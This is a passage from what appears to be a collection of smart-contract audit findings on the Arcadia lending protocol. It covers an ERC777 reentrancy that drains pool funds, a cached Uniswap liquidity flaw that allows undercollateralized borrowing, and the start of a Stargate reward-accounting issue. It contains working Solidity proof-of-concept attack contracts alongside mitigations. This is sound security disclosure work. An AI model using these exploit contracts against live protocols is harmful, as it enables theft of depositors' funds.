token4;\\n ERC777Mock token777; // <----- Add this\\n}\\n\\n...\\n\\nstruct Rates {\\n uint256 stable1ToUsd;\\n uint256 stable2ToUsd;\\n uint256 token1ToUsd;\\n uint256 token2ToUsd;\\n uint256 token3ToToken4;\\n uint256 token4ToUsd;\\n uint256 token777ToUsd; // <----- Add this\\n uint256 nft1ToToken1;\\n uint256 nft2ToUsd;\\n uint256 nft3ToToken1;\\n uint256 sft1ToToken1;\\n uint256 sft2ToUsd;\\n}`\\nReplace the contents inside `lib/accounts-v2/test/fuzz/Fuzz.t.sol` for the code found in this github gist.\\nTo finish the setup, replace the file found in `lending-v2/test/fuzz/Fuzz.t.sol` for the code found in this github gist.\\nFor the actual proof of concept, create a `Poc.t.sol` file in `test/fuzz/LendingPool` and paste the following code. The code contains the proof of concept test, as well as the action target implementation:\\n/**\\n * Created by Pragma Labs\\n * SPDX-License-Identifier: BUSL-1.1\\n */\\npragma solidity 0.8.22;\\n\\nimport { LendingPool_Fuzz_Test } from \"./_LendingPool.fuzz.t.sol\";\\n\\nimport { ActionData, IActionBase } from \"../../../lib/accounts-v2/src/interfaces/IActionBase.sol\";\\nimport { IPermit2 } from \"../../../lib/accounts-v2/src/interfaces/IPermit2.sol\";\\n\\n/// @notice Proof of Concept - Arcadia\\ncontract Poc is LendingPool_Fuzz_Test {\\n\\n /////////////////////////////////////////////////////////////////\\n // TEST CONTRACTS //\\n /////////////////////////////////////////////////////////////////\\n\\n ActionHandler internal actionHandler;\\n bytes internal callData;\\n\\n /////////////////////////////////////////////////////////////////\\n // SETUP //\\n /////////////////////////////////////////////////////////////////\\n\\n function setUp() public override {\\n // Setup pool test\\n LendingPool_Fuzz_Test.setUp();\\n\\n // Deploy action handler\\n vm.prank(users.creatorAddress);\\n actionHandler = new ActionHandler(address(liquidator), address(proxyAccount));\\n\\n // Set origination fee\\n 
vm.prank(users.creatorAddress);\\n pool.setOriginationFee(100); // 1%\\n\\n // Transfer some tokens to actiontarget to perform liquidation repayment and approve tokens to be transferred to pool \\n vm.startPrank(users.liquidityProvider);\\n mockERC20.token777.transfer(address(actionHandler), 1 ether);\\n mockERC20.token777.approve(address(pool), type(uint256).max);\\n\\n // Deposit 100 erc777 tokens into pool\\n vm.startPrank(address(srTranche));\\n pool.depositInLendingPool(100 ether, users.liquidityProvider);\\n assertEq(mockERC20.token777.balanceOf(address(pool)), 100 ether);\\n\\n // Approve creditor from actiontarget for bid payment\\n vm.startPrank(address(actionHandler));\\n mockERC20.token777.approve(address(pool), type(uint256).max);\\n\\n }\\n\\n /////////////////////////////////////////////////////////////////\\n // POC //\\n /////////////////////////////////////////////////////////////////\\n /// @notice Test exploiting the reentrancy vulnerability. \\n /// Prerequisites:\\n /// - Create an actionTarget contract that will trigger the attack flow using the ERC777 callback when receiving the \\n /// borrowed funds in the flash action.\\n /// - Have some liquidity deposited in the pool in order to be able to borrow it\\n /// Attack:\\n /// 1. Open a margin account in the creditor to be exploited.\\n /// 2. Deposit a small amount of collateral. This amount needs to be big enough to cover the `minUsdValue` configured\\n /// in the registry for the given creditor.\\n /// 3. Create the `actionData` for the account's `flashAction()` function. The data contained in it (withdrawData, transferFromOwnerData,\\n /// permit, signature and actionTargetData) can be empty, given that such data is not required for the attack.\\n /// 4. Trigger LendingPool.flashAction(). The execution flow will:\\n /// a. Mint the flash-actioned debt to the account\\n /// b. Send the borrowed funds to the action target\\n /// c. 
The action target will execute the ERC777 `tokensReceived()` callback, which will:\\n /// - Trigger Liquidator.liquidateAccount(), which will set the account in an auction state\\n /// - Trigger Liquidator.bid(). \\n \\n function testVuln_reentrancyInFlashActionEnablesStealingAllProtocolFunds(\\n uint128 amountLoaned,\\n uint112 collateralValue,\\n uint128 liquidity,\\n uint8 originationFee\\n ) public { \\n\\n //---------- STEP 1 ----------//\\n // Open a margin account\\n vm.startPrank(users.accountOwner);\\n proxyAccount.openMarginAccount(address(pool)); \\n \\n //---------- STEP 2 ----------//\\n // Deposit 1 stable token in the account as collateral.\\n // Note: The creditors's `minUsdValue` is set to 1 * 10 ** 18. Because\\n // value is converted to an 18-decimal number and the asset is pegged to 1 dollar,\\n // depositing an amount of 1 * 10 ** 6 is the actual minimum usd amount so that the \\n // account's collateral value is not considered as 0.\\n depositTokenInAccount(proxyAccount, mockERC20.stable1, 1 * 10 ** 6);\\n assertEq(proxyAccount.getCollateralValue(), 1 * 10 ** 18);\\n\\n //---------- STEP 3 ----------//\\n // Create empty action data. The action handler won't withdraw/deposit any asset from the account \\n // when the `flashAction()` callback in the account is triggered. Hence, action data will contain empty elements.\\n callData = _buildActionData();\\n\\n // Fetch balances from the action handler (who will receive all the borrowed funds from the flash action)\\n // as well as the pool. 
\\n // Action handler balance initially has 1 token of `token777` (given initially on deployment)\\n assertEq(mockERC20.token777.balanceOf(address(actionHandler)), 1 * 10 ** 18);\\n uint256 liquidityPoolBalanceBefore = mockERC20.token777.balanceOf(address(pool));\\n uint256 actionHandlerBalanceBefore = mockERC20.token777.balanceOf(address(actionHandler));\\n // Pool initially has 100 tokens of `token777` (deposited by the liquidity provider in setUp())\\n assertEq(mockERC20.token777.balanceOf(address(pool)), 100 * 10 ** 18);\\n\\n //---------- STEP 4 ----------//\\n // Step 4. Trigger the flash action.\\n vm.startPrank(users.accountOwner);\\n\\n pool.flashAction(100 ether , address(proxyAccount), address(actionHandler), callData, emptyBytes3);\\n vm.stopPrank();\\n \\n \\n //---------- FINAL ASSERTIONS ----------//\\n\\n // Action handler (who is the receiver of the borrowed funds in the flash action) has succesfully obtained 100 tokens from \\n //the pool, and in the end it has nearly 101 tokens (initially it had 1 token, plus the 100 tokens stolen \\n // from the pool minus the small amount required to pay for the bid)\\n assertGt(mockERC20.token777.balanceOf(address(actionHandler)), 100 * 10 ** 18);\\n\\n // On the other hand, pool has lost nearly all of its balance, only remaining the small amount paid from the \\n // action handler in order to bid\\n assertLt(mockERC20.token777.balanceOf(address(pool)), 0.05 * 10 ** 18);\\n \\n } \\n\\n /// @notice Internal function to build the `actionData` payload needed to execute the `flashActionByCreditor()` \\n /// callback when requesting a flash action\\n function _buildActionData() internal returns(bytes memory) {\\n ActionData memory emptyActionData;\\n address[] memory to;\\n bytes[] memory data;\\n bytes memory actionTargetData = abi.encode(emptyActionData, to, data);\\n IPermit2.PermitBatchTransferFrom memory permit;\\n bytes memory signature;\\n return abi.encode(emptyActionData, emptyActionData, permit, 
signature, actionTargetData);\\n }\\n}\\n\\n/// @notice ERC777Recipient interface\\ninterface IERC777Recipient {\\n \\n function tokensReceived(\\n address operator,\\n address from,\\n address to,\\n uint256 amount,\\n bytes calldata userData,\\n bytes calldata operatorData\\n ) external;\\n}\\n\\n /// @notice Liquidator interface\\ninterface ILiquidator {\\n function liquidateAccount(address account) external;\\n function bid(address account, uint256[] memory askedAssetAmounts, bool endAuction_) external;\\n}\\n\\n /// @notice actionHandler contract that will trigger the attack via ERC777's `tokensReceived()` callback\\ncontract ActionHandler is IERC777Recipient, IActionBase {\\n\\n ILiquidator public immutable liquidator;\\n address public immutable account;\\n uint256 triggered;\\n\\n constructor(address _liquidator, address _account) {\\n liquidator = ILiquidator(_liquidator);\\n account = _account;\\n } \\n\\n /// @notice ERC777 callback function\\n function tokensReceived(\\n address operator,\\n address from,\\n address to,\\n uint256 amount,\\n bytes calldata userData,\\n bytes calldata operatorData\\n ) external {\\n // Only trigger the callback once (avoid triggering it while receiving funds in the setup + when receiving final funds)\\n if(triggered == 1) {\\n triggered = 2;\\n liquidator.liquidateAccount(account);\\n uint256[] memory askedAssetAmounts = new uint256[](1);\\n askedAssetAmounts[0] = 1; // only ask for 1 wei of token so that we repay a small share of the debt\\n liquidator.bid(account, askedAssetAmounts, true);\\n }\\n unchecked{\\n triggered++;\\n }\\n }\\n\\n function executeAction(bytes calldata actionTargetData) external returns (ActionData memory) {\\n ActionData memory data;\\n return data;\\n }\\n\\n}\\nExecute the proof of concept with the following command (being inside the `lending-v2` folder): `forge test --mt testVuln_reentrancyInFlashActionEnablesStealingAllProtocolFunds`чThis attack is possible because the 
`getCollateralValue()` function returns a 0 collateral value due to the `minUsdValue` mentioned before not being reached after executing the bid. The Liquidator's `_settleAuction()` function then believes the collateral held in the account is 0.\\nIn order to mitigate the issue, consider fetching the actual real collateral value inside `_settleAuction()` even if it is less than the `minUsdValue` held in the account, so that the function can properly check if the full collateral was sold or not.\\n```\\n// Liquidator.sol\\nfunction _settleAuction(address account, AuctionInformation storage auctionInformation_)\\n internal\\n returns (bool success)\\n {\\n // rest of code\\n\\n uint256 collateralValue = IAccount(account).getCollateralValue(); // <----- Fetch the REAL collateral value instead of reducing it to 0 if `minUsdValue` is not reached\\n \\n \\n // rest of code\\n }\\n```\\nчThe impact for this vulnerability is high. All funds deposited in creditors with ERC777 tokens as the underlying asset can be drained.ч```\\n// Liquidator.sol\\n\\nfunction bid(address account, uint256[] memory askedAssetAmounts, bool endAuction_) external nonReentrant {\\n AuctionInformation storage auctionInformation_ = auctionInformation[account];\\n if (!auctionInformation_.inAuction) revert LiquidatorErrors.NotForSale();\\n\\n // Calculate the current auction price of the assets being bought.\\n uint256 totalShare = _calculateTotalShare(auctionInformation_, askedAssetAmounts);\\n uint256 price = _calculateBidPrice(auctionInformation_, totalShare);\\n \\n // Transfer an amount of \"price\" in \"Numeraire\" to the LendingPool to repay the Accounts debt.\\n // The LendingPool will call a \"transferFrom\" from the bidder to the pool -> the bidder must approve the LendingPool.\\n // If the amount transferred would exceed the debt, the surplus is paid out to the Account Owner and earlyTerminate is True.\\n uint128 startDebt = auctionInformation_.startDebt;\\n bool earlyTerminate = 
ILendingPool(auctionInformation_.creditor).auctionRepay(\\n startDebt, auctionInformation_.minimumMargin, price, account, msg.sender\\n );\\n // rest of code\\n}\\n```\\n -Caching Uniswap position liquidity allows borrowing using undercollateralized Uni positionsчhighчIt is possible to fake the amount of liquidity held in a Uniswap V3 position, making the protocol believe the Uniswap position has more liquidity than the actual liquidity deposited in the position. This makes it possible to borrow using undercollateralized Uniswap positions.\\nWhen depositing into an account, the `deposit()` function is called, which calls the internal `_deposit()` function. Depositing is performed in two steps:\\nThe registry's `batchProcessDeposit()` function is called. This function checks if the deposited assets can be priced, and in case that a creditor is set, it also updates the exposures and underlying assets for the creditor.\\nThe assets are transferred and deposited into the account.\\n```\\n// AccountV1.sol\\n\\nfunction _deposit(\\n address[] memory assetAddresses,\\n uint256[] memory assetIds,\\n uint256[] memory assetAmounts,\\n address from\\n ) internal {\\n // If no Creditor is set, batchProcessDeposit only checks if the assets can be priced.\\n // If a Creditor is set, batchProcessDeposit will also update the exposures of assets and underlying assets for the Creditor.\\n uint256[] memory assetTypes =\\n IRegistry(registry).batchProcessDeposit(creditor, assetAddresses, assetIds, assetAmounts);\\n\\n for (uint256 i; i < assetAddresses.length; ++i) {\\n // Skip if amount is 0 to prevent storing addresses that have 0 balance.\\n if (assetAmounts[i] == 0) continue;\\n\\n if (assetTypes[i] == 0) {\\n if (assetIds[i] != 0) revert AccountErrors.InvalidERC20Id();\\n _depositERC20(from, assetAddresses[i], assetAmounts[i]);\\n } else if (assetTypes[i] == 1) {\\n if (assetAmounts[i] != 1) revert AccountErrors.InvalidERC721Amount();\\n _depositERC721(from, assetAddresses[i], 
assetIds[i]);\\n } else if (assetTypes[i] == 2) {\\n _depositERC1155(from, assetAddresses[i], assetIds[i], assetAmounts[i]);\\n } else {\\n revert AccountErrors.UnknownAssetType();\\n }\\n }\\n\\n if (erc20Stored.length + erc721Stored.length + erc1155Stored.length > ASSET_LIMIT) {\\n revert AccountErrors.TooManyAssets();\\n }\\n }\\n```\\n\\nFor Uniswap positions (and assuming that a creditor is set), calling `batchProcessDeposit()` will internally trigger the UniswapV3AM.processDirectDeposit():\\n```\\n// UniswapV3AM.sol\\n\\nfunction processDirectDeposit(address creditor, address asset, uint256 assetId, uint256 amount)\\n public\\n override\\n returns (uint256 recursiveCalls, uint256 assetType)\\n {\\n // Amount deposited of a Uniswap V3 LP can be either 0 or 1 (checked in the Account).\\n // For uniswap V3 every id is a unique asset -> on every deposit the asset must added to the Asset Module.\\n if (amount == 1) _addAsset(assetId);\\n\\n // rest of code\\n }\\n```\\n\\nThe Uniswap position will then be added to the protocol using the internal `_addAsset()` function. One of the most important actions performed inside this function is to store the liquidity that the Uniswap position has in that moment. 
Such liquidity is obtained from directly querying the NonfungiblePositionManager contract:\\n```\\nfunction _addAsset(uint256 assetId) internal {\\n // rest of code\\n\\n (,, address token0, address token1,,,, uint128 liquidity,,,,) = NON_FUNGIBLE_POSITION_MANAGER.positions(assetId);\\n\\n // No need to explicitly check if token0 and token1 are allowed, _addAsset() is only called in the\\n // deposit functions and there any deposit of non-allowed Underlying Assets will revert.\\n if (liquidity == 0) revert ZeroLiquidity();\\n\\n // The liquidity of the Liquidity Position is stored in the Asset Module,\\n // not fetched from the NonfungiblePositionManager.\\n // Since liquidity of a position can be increased by a non-owner,\\n // the max exposure checks could otherwise be circumvented.\\n assetToLiquidity[assetId] = liquidity;\\n\\n // rest of code\\n }\\n```\\n\\nAs the snippet shows, the liquidity is stored in a mapping because “Since liquidity of a position can be increased by a non-owner, the max exposure checks could otherwise be circumvented.”. From this point forward, and until the Uniswap position is withdrawn from the account, the collateral value (i.e the amount that the position is worth) will be computed utilizing the `_getPosition()` internal function, which will read the cached liquidity value stored in the `assetToLiquidity[assetId]` mapping, rather than directly consulting the NonFungibleManager contract. 
This way, the position won't be able to surpass the max exposures:\\n```\\n// UniswapV3AM.sol\\n\\nfunction _getPosition(uint256 assetId)\\n internal\\n view\\n returns (address token0, address token1, int24 tickLower, int24 tickUpper, uint128 liquidity)\\n {\\n // For deposited assets, the liquidity of the Liquidity Position is stored in the Asset Module,\\n // not fetched from the NonfungiblePositionManager.\\n // Since liquidity of a position can be increased by a non-owner, the max exposure checks could otherwise be circumvented.\\n liquidity = uint128(assetToLiquidity[assetId]);\\n\\n if (liquidity > 0) {\\n (,, token0, token1,, tickLower, tickUpper,,,,,) = NON_FUNGIBLE_POSITION_MANAGER.positions(assetId);\\n } else {\\n // Only used as an off-chain view function by getValue() to return the value of a non deposited Liquidity Position.\\n (,, token0, token1,, tickLower, tickUpper, liquidity,,,,) = NON_FUNGIBLE_POSITION_MANAGER.positions(assetId);\\n }\\n }\\n```\\n\\nHowever, storing the liquidity leads to an attack vector that allows Uniswap positions' liquidity to be completely withdrawn while making the protocol believe that the Uniswap position is still full.\\nAs mentioned in the beginning of the report, the deposit process is done in two steps: processing assets in the registry and transferring the actual assets to the account. Because processing assets in the registry is the step where the Uniswap position's liquidity is cached, a malicious depositor can use an ERC777 hook in the transferring process to withdraw the liquidity in the Uniswap position.\\nThe following steps show how the attack could be performed:\\nInitially, a malicious contract must be created. 
This contract will be the one holding the assets and depositing them into the account, and will also be able to trigger the ERC777's `tokensToSend()` hook.\\nThe malicious contract will call the account's `deposit()` function with two `assetAddresses` to be deposited: the first asset must be an ERC777 token, and the second asset must be the Uniswap position.\\n`IRegistry(registry).batchProcessDeposit()` will then execute. This is the first of the two steps taking place to deposit assets, where the liquidity from the Uniswap position will be fetched from the NonFungiblePositionManager and stored in the `assetToLiquidity[assetId]` mapping.\\nAfter processing the assets, the transferring phase will start. The first asset to be transferred will be the ERC777 token. This will trigger the `tokensToSend()` hook in our malicious contract. At this point, our contract is still the owner of the Uniswap position (the Uniswap position won't be transferred until the ERC777 transfer finishes), so the liquidity in the Uniswap position can be decreased inside the hook triggered in the malicious contract. This leaves the Uniswap position with a smaller liquidity amount than the one stored in the `batchProcessDeposit()` step, making the protocol believe that the liquidity stored in the position is the one that the position had prior to starting the attack.\\nFinally, and following the transfer of the ERC777 token, the Uniswap position will be transferred and succesfully deposited in the account. 
Arcadia will believe that the account has a Uniswap position worth some liquidity, when in reality the Uni position will be empty.\\nProof of Concept\\nThis proof of concept show show the previous attack can be performed so that the liquidity in the uniswap position is 0, while the collateral value for the account is far greater than 0.\\nCreate a `ERC777Mock.sol` file in `lib/accounts-v2/test/utils/mocks/tokens` and paste the code found in this github gist.\\nImport the ERC777Mock and change the MockOracles, MockERC20 and Rates structs in `lib/accounts-v2/test/utils/Types.sol` to add an additional `token777ToUsd`, `token777` of type ERC777Mock and `token777ToUsd` rate:\\n`import \"../utils/mocks/tokens/ERC777Mock.sol\"; // <----- Import this\\n\\n...\\n\\nstruct MockOracles {\\n ArcadiaOracle stable1ToUsd;\\n ArcadiaOracle stable2ToUsd;\\n ArcadiaOracle token1ToUsd;\\n ArcadiaOracle token2ToUsd;\\n ArcadiaOracle token3ToToken4;\\n ArcadiaOracle token4ToUsd;\\n ArcadiaOracle token777ToUsd; // <----- Add this\\n ArcadiaOracle nft1ToToken1;\\n ArcadiaOracle nft2ToUsd;\\n ArcadiaOracle nft3ToToken1;\\n ArcadiaOracle sft1ToToken1;\\n ArcadiaOracle sft2ToUsd;\\n}\\n\\nstruct MockERC20 {\\n ERC20Mock stable1;\\n ERC20Mock stable2;\\n ERC20Mock token1;\\n ERC20Mock token2;\\n ERC20Mock token3;\\n ERC20Mock token4;\\n ERC777Mock token777; // <----- Add this\\n}\\n\\n...\\n\\nstruct Rates {\\n uint256 stable1ToUsd;\\n uint256 stable2ToUsd;\\n uint256 token1ToUsd;\\n uint256 token2ToUsd;\\n uint256 token3ToToken4;\\n uint256 token4ToUsd;\\n uint256 token777ToUsd; // <----- Add this\\n uint256 nft1ToToken1;\\n uint256 nft2ToUsd;\\n uint256 nft3ToToken1;\\n uint256 sft1ToToken1;\\n uint256 sft2ToUsd;\\n}`\\nReplace the contents inside `lib/accounts-v2/test/fuzz/Fuzz.t.sol` for the code found in this github gist.\\nNext step is to replace the file found in `lending-v2/test/fuzz/Fuzz.t.sol` for the code found in this github gist.\\nCreate a `PocUniswap.t.sol` file in 
`lending-v2/test/fuzz/LendingPool/PocUniswap.t.sol` and paste the following code snippet into it:\\n`/**\\n * Created by Pragma Labs\\n * SPDX-License-Identifier: BUSL-1.1\\n */\\npragma solidity 0.8.22;\\n\\nimport { LendingPool_Fuzz_Test } from \"./_LendingPool.fuzz.t.sol\";\\n\\nimport { IPermit2 } from \"../../../lib/accounts-v2/src/interfaces/IPermit2.sol\";\\nimport { UniswapV3AM_Fuzz_Test, UniswapV3Fixture, UniswapV3AM, IUniswapV3PoolExtension, TickMath } from \"../../../lib/accounts-v2/test/fuzz/asset-modules/UniswapV3AM/_UniswapV3AM.fuzz.t.sol\";\\nimport { ERC20Mock } from \"../../../lib/accounts-v2/test/utils/mocks/tokens/ERC20Mock.sol\";\\n\\nimport \"forge-std/console.sol\";\\n\\ninterface IERC721 {\\n function ownerOf(uint256 tokenid) external returns(address);\\n function approve(address spender, uint256 tokenId) external;\\n}\\n \\n/// @notice Proof of Concept - Arcadia\\ncontract Poc is LendingPool_Fuzz_Test, UniswapV3AM_Fuzz_Test { \\n\\n /////////////////////////////////////////////////////////////////\\n // CONSTANTS //\\n /////////////////////////////////////////////////////////////////\\n int24 private MIN_TICK = -887_272;\\n int24 private MAX_TICK = -MIN_TICK;\\n\\n /////////////////////////////////////////////////////////////////\\n // STORAGE //\\n /////////////////////////////////////////////////////////////////\\n AccountOwner public accountOwnerContract;\\n ERC20Mock token0;\\n ERC20Mock token1;\\n uint256 tokenId;\\n\\n /////////////////////////////////////////////////////////////////\\n // SETUP //\\n /////////////////////////////////////////////////////////////////\\n\\n function setUp() public override(LendingPool_Fuzz_Test, UniswapV3AM_Fuzz_Test) {\\n // Setup pool test\\n LendingPool_Fuzz_Test.setUp();\\n\\n // Deploy fixture for Uniswap.\\n UniswapV3Fixture.setUp();\\n\\n deployUniswapV3AM(address(nonfungiblePositionManager));\\n\\n vm.startPrank(users.riskManager);\\n registryExtension.setRiskParametersOfDerivedAM(\\n 
address(pool), address(uniV3AssetModule), type(uint112).max, 100\\n );\\n \\n token0 = mockERC20.token1;\\n token1 = mockERC20.token2;\\n (token0, token1) = token0 < token1 ? (token0, token1) : (token1, token0);\\n\\n // Deploy account owner\\n accountOwnerContract = new AccountOwner(address(nonfungiblePositionManager));\\n\\n \\n // Set origination fee\\n vm.startPrank(users.creatorAddress);\\n pool.setOriginationFee(100); // 1%\\n\\n // Transfer ownership to Account Owner \\n vm.startPrank(users.accountOwner);\\n factory.safeTransferFrom(users.accountOwner, address(accountOwnerContract), address(proxyAccount));\\n vm.stopPrank();\\n \\n\\n // Mint uniswap position underlying tokens to accountOwnerContract\\n mockERC20.token1.mint(address(accountOwnerContract), 100 ether);\\n mockERC20.token2.mint(address(accountOwnerContract), 100 ether);\\n\\n // Open Uniswap position \\n tokenId = _openUniswapPosition();\\n \\n\\n // Transfer some ERC777 tokens to accountOwnerContract. These will be used to be deposited as collateral into the account\\n vm.startPrank(users.liquidityProvider);\\n mockERC20.token777.transfer(address(accountOwnerContract), 1 ether);\\n }\\n\\n /////////////////////////////////////////////////////////////////\\n // POC //\\n /////////////////////////////////////////////////////////////////\\n /// @notice Test exploiting the reentrancy vulnerability. \\n function testVuln_borrowUsingUndercollateralizedUniswapPosition(\\n uint128 amountLoaned,\\n uint112 collateralValue,\\n uint128 liquidity,\\n uint8 originationFee\\n ) public { \\n\\n //---------- STEP 1 ----------//\\n // Open margin account setting pool as new creditor\\n vm.startPrank(address(accountOwnerContract));\\n proxyAccount.openMarginAccount(address(pool)); \\n \\n //---------- STEP 2 ----------//\\n // Deposit assets into account. The order of the assets to be deposited is important. 
The first asset will be an ERC777 token that triggers the callback on transferring.\\n // The second asset will be the uniswap position.\\n\\n address[] memory assetAddresses = new address[](2);\\n assetAddresses[0] = address(mockERC20.token777);\\n assetAddresses[1] = address(nonfungiblePositionManager);\\n uint256[] memory assetIds = new uint256[](2);\\n assetIds[0] = 0;\\n assetIds[1] = tokenId;\\n uint256[] memory assetAmounts = new uint256[](2);\\n assetAmounts[0] = 1; // no need to send more than 1 wei as the ERC777 only serves to trigger the callback\\n assetAmounts[1] = 1;\\n // Set approvals\\n IERC721(address(nonfungiblePositionManager)).approve(address(proxyAccount), tokenId);\\n mockERC20.token777.approve(address(proxyAccount), type(uint256).max);\\n\\n // Perform deposit. \\n // Deposit will perform two steps:\\n // 1. processDeposit(): this step will handle the deposited assets and verify everything is correct. For uniswap positions, the liquidity in the position\\n // will be stored in the `assetToLiquidity` mapping.\\n // 2.Transferring the assets: after processing the assets, the actual asset transfers will take place. First, the ER777 colallateral will be transferred. \\n // This will trigger the callback in the accountOwnerContract (the account owner), which will withdraw all the uniswap position liquidity. Because the uniswap \\n // position liquidity has been cached in step 1 (processDeposit()), the protocol will still believe that the uniswap position has some liquidity, when in reality\\n // all the liquidity from the position has been withdrawn in the ERC777 `tokensToSend()` callback. \\n proxyAccount.deposit(assetAddresses, assetIds, assetAmounts);\\n\\n //---------- FINAL ASSERTIONS ----------//\\n // Collateral value fetches the `assetToLiquidity` value cached prior to removing position liquidity. 
This does not reflect that the position is empty,\\n // hence it is possible to borrow with an empty uniswap position.\\n uint256 finalCollateralValue = proxyAccount.getCollateralValue();\\n\\n // Liquidity in the position is 0.\\n (\\n ,\\n ,\\n ,\\n ,\\n ,\\n ,\\n ,\\n uint128 liquidity,\\n ,\\n ,\\n ,\\n ) = nonfungiblePositionManager.positions(tokenId); \\n\\n console.log(\"Collateral value of account:\", finalCollateralValue);\\n console.log(\"Actual liquidity in position\", liquidity);\\n\\n assertEq(liquidity, 0);\\n assertGt(finalCollateralValue, 1000 ether); // Collateral value is greater than 1000\\n } \\n\\n function _openUniswapPosition() internal returns(uint256 tokenId) {\\n vm.startPrank(address(accountOwnerContract));\\n \\n uint160 sqrtPriceX96 = uint160(\\n calculateAndValidateRangeTickCurrent(\\n 10 * 10**18, // priceToken0\\n 20 * 10**18 // priceToken1\\n )\\n );\\n\\n // Create Uniswap V3 pool initiated at tickCurrent with cardinality 300.\\n IUniswapV3PoolExtension uniswapPool = createPool(token0, token1, TickMath.getSqrtRatioAtTick(TickMath.getTickAtSqrtRatio(sqrtPriceX96)), 300);\\n\\n // Approve liquidity\\n mockERC20.token1.approve(address(uniswapPool), type(uint256).max);\\n mockERC20.token2.approve(address(uniswapPool), type(uint256).max);\\n\\n // Mint liquidity position.\\n uint128 liquidity = 100 * 10**18;\\n tokenId = addLiquidity(uniswapPool, liquidity, address(accountOwnerContract), MIN_TICK, MAX_TICK, false);\\n \\n assertEq(IERC721(address(nonfungiblePositionManager)).ownerOf(tokenId), address(accountOwnerContract));\\n }\\n \\n}\\n\\n/// @notice ERC777Sender interface\\ninterface IERC777Sender {\\n /**\\n * @dev Called by an {IERC777} token contract whenever a registered holder's\\n * (`from`) tokens are about to be moved or destroyed. 
The type of operation\\n * is conveyed by `to` being the zero address or not.\\n *\\n * This call occurs _before_ the token contract's state is updated, so\\n * {IERC777-balanceOf}, etc., can be used to query the pre-operation state.\\n *\\n * This function may revert to prevent the operation from being executed.\\n */\\n function tokensToSend(\\n address operator,\\n address from,\\n address to,\\n uint256 amount,\\n bytes calldata userData,\\n bytes calldata operatorData\\n ) external;\\n}\\n\\ninterface INonfungiblePositionManager {\\n function positions(uint256 tokenId)\\n external\\n view\\n returns (\\n uint96 nonce,\\n address operator,\\n address token0,\\n address token1,\\n uint24 fee,\\n int24 tickLower,\\n int24 tickUpper,\\n uint128 liquidity,\\n uint256 feeGrowthInside0LastX128,\\n uint256 feeGrowthInside1LastX128,\\n uint128 tokensOwed0,\\n uint128 tokensOwed1\\n );\\n\\n struct DecreaseLiquidityParams {\\n uint256 tokenId;\\n uint128 liquidity;\\n uint256 amount0Min;\\n uint256 amount1Min;\\n uint256 deadline;\\n }\\n function decreaseLiquidity(DecreaseLiquidityParams calldata params)\\n external\\n payable\\n returns (uint256 amount0, uint256 amount1);\\n}\\n\\n /// @notice AccountOwner contract that will trigger the attack via ERC777's `tokensToSend()` callback\\ncontract AccountOwner is IERC777Sender {\\n\\n INonfungiblePositionManager public nonfungiblePositionManager;\\n\\n constructor(address _nonfungiblePositionManager) {\\n nonfungiblePositionManager = INonfungiblePositionManager(_nonfungiblePositionManager);\\n }\\n\\n function tokensToSend(\\n address operator,\\n address from,\\n address to,\\n uint256 amount,\\n bytes calldata userData,\\n bytes calldata operatorData\\n ) external {\\n // Remove liquidity from Uniswap position\\n (\\n ,\\n ,\\n ,\\n ,\\n ,\\n ,\\n ,\\n uint128 liquidity,\\n ,\\n ,\\n ,\\n ) = nonfungiblePositionManager.positions(1); // tokenId 1\\n\\n INonfungiblePositionManager.DecreaseLiquidityParams memory params = 
INonfungiblePositionManager.DecreaseLiquidityParams({\\n tokenId: 1,\\n liquidity: liquidity,\\n amount0Min: 0,\\n amount1Min: 0,\\n deadline: block.timestamp\\n });\\n nonfungiblePositionManager.decreaseLiquidity(params);\\n }\\n \\n\\n function onERC721Received(address, address, uint256, bytes calldata) public pure returns (bytes4) {\\n return bytes4(abi.encodeWithSignature(\"onERC721Received(address,address,uint256,bytes)\"));\\n }\\n\\n}`\\nExecute the following command being inside the `lending-v2` folder: `forge test --mt testVuln_borrowUsingUndercollateralizedUniswapPosition -vvvvv`.\\nNOTE: It is possible that you find issues related to code not being found. This is because the Uniswap V3 deployment uses foundry's `vm.getCode()` and we are importing the deployment file from the `accounts-v2` repo to the `lending-v2` repo, which makes foundry throw some errors. To fix this, just compile the contracts in the `accounts-v2` repo and copy the missing folders from the `accounts-v2/out` generated folder into the `lending-v2/out` folder.чThere are several ways to mitigate this issue. One possible option is to perform the transfer of assets when depositing at the same time that the asset is processed, instead of first processing the assets (and storing the Uniswap liquidity) and then transferring them. Another option is to perform a liquidity check after depositing the Uniswap position, ensuring that the liquidity stored in the assetToLiquidity[assetId] mapping and the one returned by the NonFungiblePositionManager are the same.чHigh. The protocol will always believe that there is liquidity deposited in the Uniswap position while in reality the position is empty. 
This allows for undercollateralized borrows, essentially enabling the protocol to be drained if the attack is performed utilizing several uniswap positions.ч```\\n// AccountV1.sol\\n\\nfunction _deposit(\\n address[] memory assetAddresses,\\n uint256[] memory assetIds,\\n uint256[] memory assetAmounts,\\n address from\\n ) internal {\\n // If no Creditor is set, batchProcessDeposit only checks if the assets can be priced.\\n // If a Creditor is set, batchProcessDeposit will also update the exposures of assets and underlying assets for the Creditor.\\n uint256[] memory assetTypes =\\n IRegistry(registry).batchProcessDeposit(creditor, assetAddresses, assetIds, assetAmounts);\\n\\n for (uint256 i; i < assetAddresses.length; ++i) {\\n // Skip if amount is 0 to prevent storing addresses that have 0 balance.\\n if (assetAmounts[i] == 0) continue;\\n\\n if (assetTypes[i] == 0) {\\n if (assetIds[i] != 0) revert AccountErrors.InvalidERC20Id();\\n _depositERC20(from, assetAddresses[i], assetAmounts[i]);\\n } else if (assetTypes[i] == 1) {\\n if (assetAmounts[i] != 1) revert AccountErrors.InvalidERC721Amount();\\n _depositERC721(from, assetAddresses[i], assetIds[i]);\\n } else if (assetTypes[i] == 2) {\\n _depositERC1155(from, assetAddresses[i], assetIds[i], assetAmounts[i]);\\n } else {\\n revert AccountErrors.UnknownAssetType();\\n }\\n }\\n\\n if (erc20Stored.length + erc721Stored.length + erc1155Stored.length > ASSET_LIMIT) {\\n revert AccountErrors.TooManyAssets();\\n }\\n }\\n```\\n -Stargate `STG` rewards are accounted incorrectly by `StakedStargateAM.sol`чmediumчStargate LP_STAKING_TIME contract clears and sends rewards to the caller every time `deposit()` is called but StakedStargateAM does not take it into account.\\nWhen either mint() or increaseLiquidity() are called the `assetState[asset].lastRewardGlobal` variable is not reset to `0` even though the rewards have been transferred and accounted for on stargate side.\\nAfter a call to mint() or increaseLiquidity() 
